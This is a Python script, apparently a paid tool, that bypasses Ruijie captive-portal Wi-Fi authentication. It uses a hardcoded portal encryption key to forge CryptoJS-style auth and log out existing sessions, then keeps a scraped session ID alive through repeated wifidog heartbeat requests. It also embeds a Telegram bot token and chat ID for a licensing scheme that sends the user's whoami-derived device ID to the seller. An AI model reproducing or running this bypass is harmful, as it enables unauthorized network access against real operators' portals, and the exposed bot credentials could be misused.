import getpass
import os
import re
import sys
import time
import ping3
import base64
import random
import string
import aiohttp
import asyncio
import hashlib
import requests
import subprocess
from datetime import timedelta, datetime
from urllib.parse import unquote, urlparse, parse_qs
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

# ===== Colors =====
r, g, y, b, w, c = "\033[1;31m", "\033[1;32m", "\033[1;33m", "\033[1;34m", "\033[0m", "\033[1;36m"

# ===== Telegram Config =====
TELEGRAM_BOT_TOKEN = "8791054334:AAH5M2zpHsEEJ9-QEaTARclp6SEtnsALCdI"
TELEGRAM_CHAT_ID = "7774402865"

# ===== Target URL =====
TARGET_URL = "https://portal-as.ruijienetworks.com/api/auth/wifidog?stage=portal&gw_id=4c49684b2d2e&gw_sn=H1U82VB006839&gw_address=192.168.110.1&gw_port=2060&ip=192.168.110.180&mac=ea:4b:cc:49:db:bd&slot_num=16&nasip=192.168.1.63&ssid=VLAN233&ustate=0&mac_req=1&url=http%3A%2F%2F192.168.0.1%2F&chap_id=%5C311&chap_challenge=%5C251%5C002%5C152%5C160%5C153%5C313%5C221%5C035%5C277%5C321%5C256%5C070%5C153%5C351%5C231%5C142"

LOG_FILE = "bypass_history.txt"
LICENSE_FILE = ".license"

# ===== Utility =====
def clear():
    os.system('cls' if os.name == 'nt' else 'clear')

def Line():
    print(f"{y}â”€{w}" * os.get_terminal_size().columns)

def get_device_id():
    id_file = ".device_id"
    if os.path.exists(id_file):
        try:
            with open(id_file, "r") as f:
                return f.read().strip()
        except:
            pass
    try:
        result = subprocess.check_output("whoami", shell=True, encoding='utf-8')
        device_id = result.strip()
        if device_id:
            clean_id = re.sub(r'[^A-Za-z0-9]', '', device_id).upper()
            clean_id = (clean_id[:6] if len(clean_id) >= 6 else clean_id.ljust(6, 'X'))
            new_id = f"STR-{clean_id}"
            with open(id_file, "w") as f:
                f.write(new_id)
            return new_id
    except:
        pass
    try:
        device_id = getpass.getuser()
        if device_id:
            clean_id = re.sub(r'[^A-Za-z0-9]', '', device_id).upper()
            clean_id = clean_id[:6].ljust(6, 'X')
            new_id = f"STR-{clean_id}"
            with open(id_file, "w") as f:
                f.write(new_id)
            return new_id
    except:
        pass
    random_id = "STR-" + ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
    with open(id_file, "w") as f:
        f.write(random_id)
    return random_id

def write_log(message):
    timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    log_entry = f"[{timestamp}] {message}\n"
    with open(LOG_FILE, "a", encoding="utf-8") as f:
        f.write(log_entry)

def format_remaining(remaining):
    if remaining is None:
        return "Unknown"
    days = remaining.days
    hours = remaining.seconds // 3600
    minutes = (remaining.seconds % 3600) // 60
    if days > 0:
        return f"{days}d {hours}h"
    elif hours > 0:
        return f"{hours}h {minutes}m"
    else:
        return f"{minutes}m"

# ===== License Manager =====
def get_license_status():
    if not os.path.exists(LICENSE_FILE):
        return None, None, None, None
    try:
        with open(LICENSE_FILE, "r") as f:
            data = f.read().strip().split("|")
            if len(data) != 2:
                return None, None, None, None
            key, exp_ts = data
            exp_dt = datetime.fromtimestamp(float(exp_ts))
            now = datetime.now()
            if now < exp_dt:
                return True, key, exp_dt, exp_dt - now
            else:
                return False, key, exp_dt, None
    except:
        return None, None, None, None

def save_license(key, days):
    exp_dt = datetime.now() + timedelta(days=days)
    with open(LICENSE_FILE, "w") as f:
        f.write(f"{key}|{exp_dt.timestamp()}")
    return exp_dt

def send_telegram_message(text):
    url = f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/sendMessage"
    payload = {"chat_id": TELEGRAM_CHAT_ID, "text": text}
    try:
        requests.post(url, json=payload, timeout=5)
    except:
        pass

def get_updates(offset=None):
    url = f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/getUpdates"
    params = {"timeout": 10, "offset": offset} if offset else {"timeout": 10}
    try:
        resp = requests.get(url, params=params, timeout=12)
        if resp.status_code == 200:
            return resp.json().get("result", [])
    except:
        pass
    return []

def request_license_via_telegram(user_key):
    device_id = get_device_id()
    msg = f"ðŸ”‘ *License Request*\nðŸ“± Device: `{device_id}`\nðŸ” Key: `{user_key}`\n\nReply: `/allow {user_key} <days>`"
    send_telegram_message(msg)
    print(f"{c}[*] Request sent to Telegram. Waiting for admin approval...{w}")
    
    last_update_id = None
    timeout = 120
    start = time.time()
    while time.time() - start < timeout:
        updates = get_updates(offset=last_update_id)
        for update in updates:
            last_update_id = update.get("update_id") + 1
            msg_obj = update.get("message")
            if msg_obj and str(msg_obj.get("chat", {}).get("id")) == TELEGRAM_CHAT_ID:
                text = msg_obj.get("text", "").strip()
                match = re.match(rf"^/allow\s+{re.escape(user_key)}\s+(\d+)$", text, re.I)
                if match:
                    days = int(match.group(1))
                    if days <= 0:
                        send_telegram_message(f"âŒ Invalid days for {user_key}")
                        continue
                    exp_dt = save_license(user_key, days)
                    send_telegram_message(f"âœ… License granted for `{user_key}`. Expires: {exp_dt.strftime('%Y-%m-%d')}")
                    return True
                else:
                    if text.lower().startswith("/deny") and user_key in text:
                        send_telegram_message(f"âŒ License denied for {user_key}")
                        return False
        time.sleep(2)
    send_telegram_message(f"â° Timeout for {user_key}")
    return False

# ===== WifiSetup (unchanged) =====
class WifiSetup:
    def __init__(self, gw_address, chap_id, chap_challenge):
        self.baseurl = f"http://{gw_address}:2060"
        self.username_get_url = self.baseurl + "/username_get"
        self.online_info_url = self.baseurl + "/user/online_info"
        self.logout_url = self.baseurl + "/user/logout"
        self.enc_key = "RjYkhwzx$2018!"
        self.chap_id = chap_id
        self.chap_challenge = chap_challenge

    def start_setup(self):
        print(f"\n{c}[*] Starting Ruijie Wi-Fi Setup...{w}")
        status = self.unbind()
        Line()
        if not status:
            print(f"{y}[!] Unbind old session failed!{w}")
            write_log("Wi-Fi Setup - unbind failed")
        else:
            print(f"{g}[+] Old session unbound successfully!{w}")
            write_log("Wi-Fi Setup - unbind success")
        time.sleep(1)

    def unbind(self):
        username = self.username_get()
        if not username: return False
        online_info = self.get_online_info(username)
        if not online_info: return False
        data = self.arrange_data(online_info)
        return self.logout(data, username)

    def username_get(self):
        try: return requests.get(self.username_get_url, timeout=5).json().get("username", None)
        except: return None

    def get_online_info(self, username):
        params = {"username": username, "usertype": "wifidog"}
        try: return requests.get(self.online_info_url, params=params, timeout=5).json()["data"]["list"][0]
        except: return None

    def arrange_data(self, info):
        repmac = info["mac"].replace(":", "")
        repmac = [repmac[i:i+4] for i in range(0, len(repmac), 4)]
        return {"ip": info["ip"], "mac": info["mac"], "ip_req": info["ip"], "mac_req": ".".join(repmac)}

    def encrypt_cryptojs(self, auth, enc_key):
        salt = get_random_bytes(8)
        key_iv = b''
        prev = b''
        while len(key_iv) < 48:
            prev = hashlib.md5(prev + enc_key.encode("utf-8") + salt).digest()
            key_iv += prev
        cipher = AES.new(key_iv[:32], AES.MODE_CBC, key_iv[32:48])
        return base64.b64encode(b"Salted__" + salt + cipher.encrypt(pad(auth.encode("utf-8"), AES.block_size))).decode("utf-8")

    def get_auth(self, username):
        if not self.chap_id or not self.chap_challenge: return None
        auth = unquote(self.chap_id) + unquote(self.chap_challenge) + username
        return self.encrypt_cryptojs(auth, self.enc_key)

    def logout(self, data, username):
        auth = self.get_auth(username)
        if not auth: return False
        payload = f"ip={data['ip']}&mac={data['mac']}&ip_req={data['ip_req']}&mac_req={data['mac_req']}&auth={auth}"
        try: return bool(requests.post(self.logout_url, data=payload, timeout=5).json().get("success"))
        except: return False

# ===== Bypass Engine (unchanged) =====
async def get_session_id(session, session_url, previous_session_id):
    headers = {
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'accept-language': 'en-US,en;q=0.9',
        'referer': session_url,
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'
    }
    try:
        async with session.get(session_url, headers=headers, allow_redirects=True) as req:
            response = str(req.url)
            session_id = re.search(r"[?&]sessionId=([a-zA-Z0-9]+)", response)
            if session_id: return session_id.group(1)
            return previous_session_id
    except:
        return previous_session_id

async def get_session_id_alt(session, session_url):
    headers = {
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0',
    }
    try:
        async with session.get(session_url, headers=headers, allow_redirects=True, timeout=10) as req:
            response = str(req.url)
            for pattern in [r"[?&]sessionId=([a-zA-Z0-9]+)", r"sid=([a-zA-Z0-9]+)"]:
                match = re.search(pattern, response)
                if match: return match.group(1)
            return False
    except:
        return False

async def send_heartbeat(session, ip, session_id):
    headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.9',
        'User-Agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Mobile Safari/537.36',
    }
    params = {'token': session_id, 'phoneNumber': 'HELLO WORLD'}
    try:
        async with session.get(f'http://{ip}:2060/wifidog/auth?', params=params, headers=headers, allow_redirects=True) as req:
            response = str(req.url)
            if "baidu.com" in response or "portal-as.ruijienetworks.com" in response or "success.html" in response:
                return True
            return False
    except:
        return False

async def get_smart_ping():
    for target in ["google.com", "8.8.8.8", "cloudflare.com"]:
        ping = await asyncio.to_thread(ping3.ping, target, timeout=2)
        if ping is not None:
            ms = int(ping * 1000)
            if ms >= 100: return f"{r}{ms} ms{w}"
            elif ms >= 70: return f"{y}{ms} ms{w}"
            return f"{g}{ms} ms{w}"
    return f"{r}Offline{w}"

async def bypass_loop(session_url, ip):
    timeout = aiohttp.ClientTimeout(total=15)
    connector = aiohttp.TCPConnector(limit=512, ttl_dns_cache=300)
    async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
        write_log("Bypass started.")
        session_id = None
        while session_id is None:
            print(f"{g}[*] Extracting session ID...{w}")
            session_id = await get_session_id(session, session_url, None)
            if not session_id:
                session_id = await get_session_id_alt(session, session_url)
            if not session_id:
                print(f"{y}[!] Retrying in 3s...{w}")
                await asyncio.sleep(3)
        print(f"{g}[+] Session locked: {session_id}{w}")
        Line()
        consecutive_failures = 0
        while True:
            try:
                status = await send_heartbeat(session, ip, session_id)
                ping = await get_smart_ping()
                if status:
                    consecutive_failures = 0
                    print(f"{g}[+] Connected | Latency: {ping}{w}")
                else:
                    consecutive_failures += 1
                    print(f"{r}[!] Heartbeat failed (#{consecutive_failures}){w}")
                    new_id = await get_session_id(session, session_url, session_id)
                    if new_id:
                        session_id = new_id
                        consecutive_failures = 0
                        print(f"{g}[+] Session refreshed.{w}")
                    elif consecutive_failures >= 5:
                        session_id = None
                        while session_id is None:
                            session_id = await get_session_id(session, session_url, None)
                            if not session_id:
                                await asyncio.sleep(2)
                        consecutive_failures = 0
                        print(f"{g}[+] Session re-acquired.{w}")
                Line()
                await asyncio.sleep(8)
            except asyncio.CancelledError:
                break
            except Exception as e:
                print(f"{r}[!] Error: {e}{w}")
                await asyncio.sleep(5)

# ===== Banner & Menu =====
def show_banner():
    clear()
    banner = f"""
{c}  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•— â–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—
  â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â•â•â•â•â•â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â•â•â•â•â•
  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—
  â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â•šâ–ˆâ–ˆâ•— â–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•”â•â•â•  â–ˆâ–ˆâ•‘â•šâ•â•â•â•â–ˆâ–ˆâ•‘
  â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘â•šâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â• â•šâ–ˆâ–ˆâ–ˆâ–ˆâ•”â• â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•‘
  â•šâ•â•  â•šâ•â• â•šâ•â•â•â•â•â•   â•šâ•â•â•â•  â•šâ•â•â•â•â•â•â•â•šâ•â•â•šâ•â•â•â•â•â•â•{w}
"""
    print(banner)

def show_menu():
    print(f"""
{c}  â”Œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”
  â”‚   {g}1) Setup                    {c}â”‚
  â”‚   {g}2) Bypass                   {c}â”‚
  â”‚   {r}3) Bye                     {c}â”‚
  â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜{w}""")

# ===== Main =====
async def main():
    # ---- Check License ----
    valid, key, exp_dt, remaining = get_license_status()
    
    if valid is True:
        print(f"{g}[+] License Active! Expires in: {format_remaining(remaining)}{w}")
        print(f"{g}[+] Device: {get_device_id()}{w}")
    else:
        if valid is False:
            print(f"{r}[!] License Expired! Please re-activate.{w}")
            os.remove(LICENSE_FILE)
        
        print(f"{y}[*] No valid license found. Please enter your key.{w}")
        user_key = input(f"{g}[>] Enter License Key: {w}").strip()
        if not user_key:
            print(f"{r}[!] Key cannot be empty.{w}")
            sys.exit(1)
        
        if request_license_via_telegram(user_key):
            print(f"{g}[+] License activated successfully!{w}")
            valid, key, exp_dt, remaining = get_license_status()
            if valid:
                print(f"{g}[+] Expires on: {exp_dt.strftime('%Y-%m-%d %H:%M:%S')}{w}")
        else:
            print(f"{r}[!] Activation failed. Exiting.{w}")
            sys.exit(1)

    # ---- Main Loop ----
    gw_address, chap_id, chap_challenge = parse_target_url(TARGET_URL)
    while True:
        show_banner()
        show_menu()
        choice = input(f"  {y}Choose >>> {w}").strip()
        if choice == '1':
            setup = WifiSetup(gw_address, chap_id, chap_challenge)
            setup.start_setup()
            input(f"\n{y}Press Enter to continue...{w}")
        elif choice == '2':
            print(f"\n{c}[*] Starting Bypass...{w}")
            await bypass_loop(TARGET_URL, gw_address)
            break
        elif choice == '3':
            print(f"\n{r}Bye!{w}")
            sys.exit(0)
        else:
            print(f"{r}Invalid option.{w}")
            time.sleep(1)

def parse_target_url(url_string):
    try:
        parsed = urlparse(url_string)
        params = parse_qs(parsed.query)
        gw_address = params.get('gw_address', ['192.168.110.1'])[0]
        chap_id = params.get('chap_id', [None])[0]
        chap_challenge = params.get('chap_challenge', [None])[0]
        return gw_address, chap_id, chap_challenge
    except:
        return "192.168.110.1", None, None

if __name__ == "__main__":
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        print(f"\n{r}Interrupted.{w}")
        sys.exit(0)
